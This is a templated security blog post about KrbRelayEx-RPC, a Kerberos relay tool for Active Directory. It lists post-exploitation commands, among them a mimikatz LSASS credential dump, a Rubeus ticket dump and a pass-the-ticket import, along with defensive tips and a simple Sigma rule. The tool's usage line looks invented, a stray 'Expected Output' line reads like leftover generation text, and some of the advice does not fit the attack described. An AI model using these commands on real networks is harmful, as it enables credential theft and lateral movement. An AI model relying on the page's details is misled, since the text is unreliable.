GitHub – decoder-it/KrbRelayEx-RPC

By /

Listen to this Post

KrbRelayEx-RPC is a tool designed for Kerberos relay attacks, specifically targeting RPC protocols. This tool can be used in penetration testing and red team engagements to exploit Kerberos authentication weaknesses.

GitHub Repository: decoder-it/KrbRelayEx-RPC

You Should Know:

1. Understanding Kerberos Relay Attacks

Kerberos relay attacks involve intercepting and relaying Kerberos tickets to authenticate as another user without knowing their password. This tool focuses on RPC-based relay attacks, which can be particularly dangerous in Active Directory environments.

2. Key Features of KrbRelayEx-RPC

  • Supports relaying Kerberos tickets over RPC.
  • Can bypass certain security controls like EPA (Extended Protection for Authentication).
  • Useful for lateral movement in Active Directory.

3. Practical Usage & Commands

Prerequisites:

  • A compromised machine inside the target network.
  • Knowledge of Kerberos authentication mechanics.

Example Command to Execute KrbRelayEx-RPC:

python KrbRelayEx-RPC.py -t <TARGET_HOST> -u <USERNAME> -d <DOMAIN> -p <PORT>

Post-Exploitation Steps:

1. Dump LSASS Memory for Credentials:

mimikatz.exe "sekurlsa::logonpasswords" "exit"

2. Extract Kerberos Tickets:

Rubeus.exe dump /nowrap

3. Perform Pass-the-Ticket Attack:

Rubeus.exe ptt /ticket:<BASE64_TICKET>

4. Defensive Measures (Blue Team)

  • Enable Extended Protection for Authentication (EPA) in AD configurations.
  • Monitor unusual RPC authentication attempts using SIEM tools.
  • Restrict NTLM usage where possible.

Example Detection Query (Sigma Rule):

title: Suspicious Kerberos Relay Attempt 
description: Detects potential Kerberos relay attacks via RPC 
logsource: 
product: windows 
service: security 
detection: 
selection: 
EventID: 4769 
ServiceName: "RPCSS" 
condition: selection

What Undercode Say:

KrbRelayEx-RPC is a powerful tool for red teams, but its misuse can lead to severe security breaches. Defenders must harden Kerberos configurations and monitor for relay attempts.

Additional Useful Commands:

  • Check Kerberos Tickets (Linux): 
    klist
  • Force Kerberos Ticket Renewal: 
    kinit -R
  • List SPNs (Service Principal Names): 
    setspn -L <USER>
  • Windows Event Log for Kerberos Events: 
    Get-WinEvent -FilterHashtable @{LogName='Security'; ID=4769}

Expected Output:

A detailed analysis of Kerberos relay attacks, practical exploitation steps, and defensive countermeasures.

References:

Reported By: Florian Hansemann – Hackers Feeds
Extra Hub: Undercode MoN
Basic Verification: Pass ✅

Join Our Cyber World:

💬 Whatsapp | 💬 TelegramFeatured Image

Related Posts: